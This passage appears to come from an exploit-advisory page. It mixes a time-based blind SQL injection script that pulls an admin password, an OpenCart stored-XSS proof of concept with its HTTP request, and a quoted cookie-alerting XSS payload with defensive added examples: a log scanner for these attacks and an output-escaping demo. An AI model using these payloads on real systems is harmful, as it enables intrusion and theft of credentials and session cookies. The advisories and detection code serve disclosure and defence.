    print("\n(+) Retrieving password from admin user...")
    # 5 is length of the password. This can
    # be dynamically stolen from the database as well!
    for i in range(1,5):
        injection_string = "admin@admin.com' AND (SELECT 1100 FROM (SELECT(SLEEP(4-(IF(ORD(MID((SELECT IFNULL(CAST(password AS NCHAR),0x20) FROM store.users ORDER BY password LIMIT 0,1),%d,1))>[CHAR],0,1)))))soLu) AND 'yHIV'='yHIV" % i
        extracted_char = chr(time_based_blind_sqli(injection_string))
        sys.stdout.write(extracted_char)
        sys.stdout.flush()
    print("\n(+) done!")

if __name__ == "__main__":
    main()
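Four of the advisories on this page leave a footprint in web server logs that a defender can look for: the Intelbras config download and the ATX user.ini disclosure are requests for a fixed path, the HFS issue is a search query whose decoded form contains the exec macro, and time-based blind injection such as the Pharmacy login form (carried in a POST body, which an access log does not record) shows up as a run of login posts from one client that each take about as long as the SLEEP() argument. This added example, not from any of the advisories, scans a constructed access-log sample in a simple format (client, timestamp, request line, status, response time) for those patterns; the log format, rule names and thresholds are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Constructed access-log sample (assumption: a simple format with the fields
# client [timestamp] "METHOD target" status response_seconds). No line is a real capture.
SAMPLE_LOG = """\
198.51.100.7 [28/Nov/2020:10:00:01] "GET /index.php" 200 0.04
198.51.100.9 [28/Nov/2020:10:00:02] "GET /cgi-bin/DownloadCfg/RouterCfm.cfg" 200 0.11
198.51.100.9 [28/Nov/2020:10:00:03] "POST /inc/user.ini" 200 0.05
203.0.113.5 [28/Nov/2020:10:00:04] "GET /?search=%00{.+exec|COMMAND_PLACEHOLDER.}" 200 0.09
203.0.113.5 [28/Nov/2020:10:00:05] "GET /?search=quarterly+report" 200 0.03
192.0.2.44 [28/Nov/2020:10:00:06] "POST /medical/login.php" 200 4.02
192.0.2.44 [28/Nov/2020:10:00:11] "POST /medical/login.php" 200 3.98
192.0.2.44 [28/Nov/2020:10:00:16] "POST /medical/login.php" 200 4.01
198.51.100.7 [28/Nov/2020:10:00:17] "POST /medical/login.php" 200 0.21
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)" '
    r'(?P<status>\d{3}) (?P<rt>\d+(?:\.\d+)?)$'
)

# Fixed paths that should never be fetched by anyone but an administrator.
INDICATOR_PATHS = {
    "/cgi-bin/DownloadCfg/RouterCfm.cfg": "intelbras-config-download",
    "/inc/user.ini": "atx-user-ini-disclosure",
}
# HFS 2.3.x template macro, matched after URL-decoding the query string.
HFS_EXEC_RE = re.compile(r"\{\.\s*\+?\s*exec\s*\|", re.IGNORECASE)

# Time-based blind injection shows up as a run of slow POSTs to a login form
# from one client; these thresholds are assumptions for the demo.
SLOW_LOGIN_SECONDS = 3.0
SLOW_LOGIN_COUNT = 3


def parse_line(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def scan(log_text):
    """Return (line_no, rule, client) alerts; line_no is None for aggregate rules."""
    alerts = []
    slow_logins = defaultdict(int)
    for line_no, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        path, query = unquote(parts.path), unquote(parts.query)
        if path in INDICATOR_PATHS:
            alerts.append((line_no, INDICATOR_PATHS[path], rec["ip"]))
        if HFS_EXEC_RE.search(query):
            alerts.append((line_no, "hfs-exec-macro", rec["ip"]))
        if (rec["method"] == "POST" and path.endswith("/login.php")
                and float(rec["rt"]) >= SLOW_LOGIN_SECONDS):
            slow_logins[rec["ip"]] += 1
    for ip, count in slow_logins.items():
        if count >= SLOW_LOGIN_COUNT:
            alerts.append((None, "time-based-sqli-pattern", ip))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Decoding the query before matching matters for the HFS rule: the request line carries %00 and may carry an encoded brace, so a pattern applied to the raw URL is easy to miss. The latency rule needs a response-time field, which Apache and nginx can emit with %D or $request_time respectively, and it is deliberately a count per client rather than a single slow request, since one slow login is normal and a dozen at exactly the same delay is not.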
-
OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
# Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
# Date: 24-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: 3.0.3.6
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29470

Stored Cross-site scripting (XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.

Attack vector:
This vulnerability allows an attacker to inject the XSS payload in the Subject field of the mail, and each time any user opens that mail on the website, the XSS triggers and the attacker is able to steal the cookie according to the crafted payload.

Vulnerable Parameters: Subject of mail.

Steps-To-Reproduce:
1. Go to the opencart admin page.
2. Now go to the Marketing-Mail option.
3. Put the below payload in the subject field of the Mail: "<script>alert(123)</script>"
5. Now click on the send button.
6. The XSS will be triggered.

POST /admin/index.php?route=marketing/contact/send&user_token=hYt4UTixry8NDaXiuhXO5mzuahIcOIO5 HTTP/1.1
Host: localhost
Connection: close
Content-Length: 206
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: localhost/admin/index.php?route=marketing/contact&user_token=hYt4UTixry8NDaXiuhXO5mzuahIcOIO5
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: __cfduid=d6a6bab42bd30fb2b2e20cad3dd5a80ed1606187757;

store_id=0&to=newsletter&customer_group_id=1&customers=&affiliates=&products=&subject=hemantsolo%22%2F%3E%3Cscript%3Ealert(123)%3C%2Fscript%3E&message=&=&=&=http%3A%2F%2F&=on&files=&=&=&=&=&file=&=&=&=_self
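Both stored XSS entries on this page (the Best Support System ticket_body and the OpenCart mail subject) come down to a submitted field being written back into HTML without encoding. This added example, not from either project, decodes the form bodies quoted in the two advisories, shows the values the application would persist, and contrasts the unencoded rendering with html.escape() applied at output time; render_unsafe, render_safe and count_tag_starts are assumptions for the demo.

```python
import html
import re
from urllib.parse import parse_qs

# Form bodies as quoted in the two advisories above (OpenCart trailing fields and
# the Best Support System app_form tokens dropped; the payload fields are verbatim).
OPENCART_BODY = ("store_id=0&to=newsletter&customer_group_id=1&customers=&affiliates=&products="
                 "&subject=hemantsolo%22%2F%3E%3Cscript%3Ealert(123)%3C%2Fscript%3E&message=")
BSS_BODY = ("ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--"
            "%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B"
            "(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=")

# A '<' followed by a letter, '!' or '/' is where the HTML parser starts a tag.
TAG_START_RE = re.compile(r"<[A-Za-z!/]")


def stored_value(body, field):
    """What the application persists: the URL-decoded field, exactly as submitted."""
    return parse_qs(body, keep_blank_values=True).get(field, [""])[0]


def render_unsafe(value):
    """The pattern both advisories exploit: the stored string dropped into markup."""
    return f"<td>{value}</td>"


def render_safe(value):
    """Output encoding at the point the value enters HTML. Done here, it does not
    matter how the string reached the database or which form submitted it."""
    return f"<td>{html.escape(value, quote=True)}</td>"


def count_tag_starts(rendered):
    """Number of tag openers inside the cell, excluding the cell's own tags."""
    inner = rendered[len("<td>"):-len("</td>")]
    return len(TAG_START_RE.findall(inner))


def demo():
    report = {}
    for name, body, field in (("opencart", OPENCART_BODY, "subject"),
                              ("best-support", BSS_BODY, "ticket_body")):
        value = stored_value(body, field)
        report[name] = {
            "stored": value,
            "unsafe_tags": count_tag_starts(render_unsafe(value)),
            "safe_tags": count_tag_starts(render_safe(value)),
            "safe_html": render_safe(value),
        }
    return report


if __name__ == "__main__":
    for name, info in demo().items():
        print(name, info["unsafe_tags"], "->", info["safe_tags"])
        print("  ", info["safe_html"])
```

Escaping is the right answer for a plain-text field such as a mail subject. The ticket editor in the other advisory legitimately submits markup (the body starts with <p><br></p>), so escaping everything would break formatting there; the fix for a rich-text field is an allowlisting HTML sanitizer that keeps elements like p and br and drops event-handler attributes such as onerror, with escaping still applied to any value that is not meant to be HTML.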